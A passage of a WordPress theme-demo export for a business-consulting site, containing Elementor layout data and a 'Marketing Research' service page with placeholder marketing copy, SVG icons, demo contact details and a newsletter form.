Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"}],"isInner":true},{"id":"2dd99d7","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"870bb75","elType":"section","settings":{"structure":"30","layout":"full_width"},"elements":[{"id":"40edabd","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true},{"id":"cfe5e81","elType":"column","settings":{"_column_size":33,"_inline_size":66.13200000000000500222085975110530853271484375},"elements":[{"id":"a078a65","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":1940},"tname":"Oliver Simson","tjob":"client of company","_id":"4b608b2"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"Manager","_id":"f2a510a"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"Designer","_id":"2012bf3"}],"arrows":"true","dots":"false","loop":"true","arrow_spacing":{"unit":"px","size":-127,"sizes":[]},"tcontent_color":"#616161"},"elements":[],"widgetType":"itestimonials2"}],"isInner":true},{"id":"79d9b22","elType":"column","settings":{"_column_size":33,"_inline_size":16.60000000000000142108547152020037174224853515625},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"e929e8c","elType":"section","settings":{"content_width":{"unit":"px","size":1340,"sizes":[]},"margin":{"unit":"px","top":"-75","right":0,"bottom":"-75","left":0,"isLinked":false},"margin_tablet":{"unit":"px","top":"-20","right":0,"bottom":"-75","left":0,"isLinked":false},"z_index":1,"margin_mobile":{"unit":"px","top":"-60","right":0,"bottom":"60","left":0,"isLinked":false}},"elements":[{"id":"81d098c","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"8de62dc","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","background_background":"classic","background_color":"#D92300","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":8,"vertical":8,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"},"padding":{"unit":"px","top":"50","right":"45","bottom":"50","left":"45","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":0,"bottom":"0","left":0,"isLinked":false},"padding_mobile":{"unit":"px","top":"40","right":"20","bottom":"40","left":"20","isLinked":false}},"elements":[{"id":"07f2dc1","elType":"column","settings":{"_column_size":50,"_inline_size":30,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"be75dc6","elType":"widget","settings":{"title":"Ready to Get Started?","header_size":"h4","title_color":"#FFFFFF","typography_font_weight":"bold","typography_font_size_mobile":{"unit":"px","size":22,"sizes":[]},"typography_typography":"custom","typography_font_family":"Amiri","typography_font_size":{"unit":"px","size":32,"sizes":[]}},"elements":[],"widgetType":"heading"}],"isInner":true},{"id":"91c3045","elType":"column","settings":{"_column_size":50,"_inline_size":70,"_inline_size_tablet":100},"elements":[{"id":"5c296ee","elType":"widget","settings":{"cf7":"741","_background_background":"classic","_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_border_radius_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ictf7"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:7:{s:6:"column";a:3:{s:5:"count";i:23;s:15:"control_percent";i:0;s:8:"controls";a:2:{s:6:"layout";a:1:{s:6:"layout";a:2:{s:12:"_inline_size";i:23;s:19:"_inline_size_tablet";i:14;}}s:8:"advanced";a:2:{s:19:"_section_responsive";a:3:{s:11:"hide_tablet";i:3;s:11:"hide_mobile";i:3;s:12:"hide_desktop";i:1;}s:16:"section_advanced";a:1:{s:13:"margin_tablet";i:1;}}}}s:8:"iheading";a:3:{s:5:"count";i:2;s:15:"control_percent";i:4;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:3:"sub";i:2;s:5:"title";i:2;s:11:"header_size";i:2;s:5:"align";i:2;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:2;}}s:5:"style";a:1:{s:13:"style_section";a:5:{s:9:"stitle_bg";i:2;s:27:"title_typography_typography";i:2;s:33:"title_typography_font_size_mobile";i:2;s:28:"stitle_typography_typography";i:2;s:27:"stitle_typography_font_size";i:2;}}}}s:7:"section";a:3:{s:5:"count";i:10;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:17:"section_structure";a:1:{s:9:"structure";i:7;}s:14:"section_layout";a:4:{s:6:"layout";i:6;s:3:"gap";i:5;s:16:"content_position";i:1;s:13:"content_width";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:7:{s:7:"padding";i:7;s:14:"padding_mobile";i:3;s:14:"padding_tablet";i:1;s:13:"margin_tablet";i:2;s:6:"margin";i:1;s:7:"z_index";i:1;s:13:"margin_mobile";i:1;}s:19:"_section_responsive";a:1:{s:12:"hide_desktop";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:6:{s:21:"background_background";i:3;s:16:"background_image";i:1;s:19:"background_position";i:1;s:17:"background_repeat";i:1;s:15:"background_size";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:3:{s:13:"border_radius";i:1;s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}s:9:"iiconbox1";a:3:{s:5:"count";i:8;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:4:{s:9:"icon_font";i:8;s:5:"title";i:8;s:3:"des";i:8;s:4:"link";i:8;}}s:5:"style";a:3:{s:18:"style_icon_section";a:2:{s:9:"is_border";i:8;s:9:"icon_size";i:8;}s:21:"style_content_section";a:2:{s:27:"title_typography_typography";i:8;s:26:"title_typography_font_size";i:8;}s:17:"style_box_section";a:1:{s:18:"bg_hover_des_color";i:8;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:5;s:15:"_padding_mobile";i:3;}}}}s:14:"itestimonials2";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:20:"section_testimonials";a:4:{s:12:"testi_slider";i:1;s:6:"arrows";i:1;s:4:"dots";i:1;s:4:"loop";i:1;}}s:5:"style";a:2:{s:9:"style_nav";a:1:{s:13:"arrow_spacing";i:1;}s:13:"style_general";a:1:{s:14:"tcontent_color";i:1;}}}}s:7:"heading";a:3:{s:5:"count";i:1;s:15:"control_percent";i:4;s:8:"controls";a:2:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:1;s:11:"header_size";i:1;}}s:5:"style";a:1:{s:19:"section_title_style";a:6:{s:11:"title_color";i:1;s:22:"typography_font_weight";i:1;s:27:"typography_font_size_mobile";i:1;s:21:"typography_typography";i:1;s:22:"typography_font_family";i:1;s:20:"typography_font_size";i:1;}}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[2033]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Marketing Research</title>
		<link>http://wpdemo.archiwp.com/maxbizz-business/our-services/marketing-research/</link>
		<pubDate>Mon, 14 Sep 2020 07:28:19 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=898</guid>
		<description></description>
		<content:encoded><![CDATA[<img width="870" height="576" src="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/service-box1.jpg 870w, https://maxbizz.s3.amazonaws.com/images/service-box1-1-300x199.jpg 300w, https://maxbizz.s3.amazonaws.com/images/service-box1-1-768x508.jpg 768w" sizes="(max-width: 870px) 100vw, 870px">
<h3>We Conduct Marketing Research</h3>
It’s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique "Today Forward, Future Back" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We’ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.

Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.

75
<h6>marketing analysis</h6>
65
<h6>business innovation</h6>
90
<h6>finance strategy</h6>
<h3>We are Always Ready to Assist Our Clients</h3>
developing financial processes and procedures
<h4>How It Works &amp; How We Do It</h4>
Our specialists are ready to provide an analysis of both the market as a whole and its individual components (competitors, consumers, product, etc.), using practical methods and starting from your research goals.
<ul>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.</li>
 	<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

there are projects that require temporary expansion of the marketing department. Align your marketing  and brand strategy with overarching business objectives. We help you combine hard metrics with creative.</li>
</ul>
<blockquote>“I cannot give you the formula for success, but I can give you the
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>
<h4>Business Planning &amp; Strategy</h4>
<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home3.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home3.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home3-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px">

Nurture promoters, your loyal customers who are more profitable and will advocate for your business—both in good times and bad.

Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization. Identify quick, targeted customized solutions and operational improvements.
<h5>Services</h5>
<ul>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/marketing-research">marketing research
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/">Organizational Audit
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/business-consulting">business consulting
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/our-services/project-management/">project management
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/our-services/support-function/">support functions
</a></li>
 	<li>
					<a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve"></svg>
<g>
<g id="c147_full_moon">
<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
</g>
<g id="Capa_1_14_">
</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>

</a><a href="http://wpdemo.archiwp.com/maxbizz/our-services/finance-planning/">finance planning
</a></li>
</ul>
<h5>Contacts</h5>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
<h6>
					Visit Us Daily</h6>
411 University St, Seattle

<a href="tel:+1-800-456-478-23">
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</a>
<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a></h6>
+1-800-456-478-23

<a href="mailto:maxbizz@mail.com">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a></h6>
maxbizz@mail.com

<a href="#">
<img width="270" height="90" src="https://maxbizz.s3.amazonaws.com/images/img-btn-pdf-home3.jpg" alt="" loading="lazy">								</a>
<h4>Ready to Get Started?</h4>
<p role="status" aria-live="polite" aria-atomic="true"></p>

<ul></ul>
<form action="/maxbizz-business/wp-admin/admin-ajax.php#wpcf7-f741-o1" method="post" novalidate="novalidate" data-status="init">
<input type="hidden" name="_wpcf7" value="741">
<input type="hidden" name="_wpcf7_version" value="5.3">
<input type="hidden" name="_wpcf7_locale" value="en_US">
<input type="hidden" name="_wpcf7_unit_tag" value="wpcf7-f741-o1">
<input type="hidden" name="_wpcf7_container_post" value="0">
<input type="hidden" name="_wpcf7_posted_data_hash" value="">
<input type="text" name="your-name" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Name *">
<input type="email" name="your-email" value="" size="40" aria-required="true" aria-invalid="false" placeholder="Your Email *">
<button type="submit">Subscribe Now</button>
</form>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>898</wp:post_id>
		<wp:post_date><![CDATA[2020-09-14 07:28:19]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-14 07:28:19]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[marketing-research]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"317e6d4","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"190","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"110","left":"0","isLinked":false},"reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"efbeefb","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"f82bab9","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/service-box1.jpg","id":902},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"_padding":{"unit":"px","top":"0","right":"0","bottom":"42","left":"0","isLinked":false}},"elements":[],"widgetType":"image"},{"id":"d516166","elType":"widget","settings":{"title":"We Conduct Marketing Research","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"611317c","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"9a4f025","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"35a9e19","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"34206bb","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"04ace53","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"1ce0cf2","elType":"widget","settings":{"bar_style":"circle","title":"business innovation\n","percent":{"unit":"%","size":65,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"725e97b","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"d809972","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"bar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"5d64ec6","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail.jpg","id":935},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"40","right":"0","bottom":"40","left":"0","isLinked":false},"border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false}},"elements":[{"id":"19280c6","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"7205aed","elType":"widget","settings":{"editor":"<h3>We are Always Ready to Assist Our Clients<\/h3><p>developing financial processes and 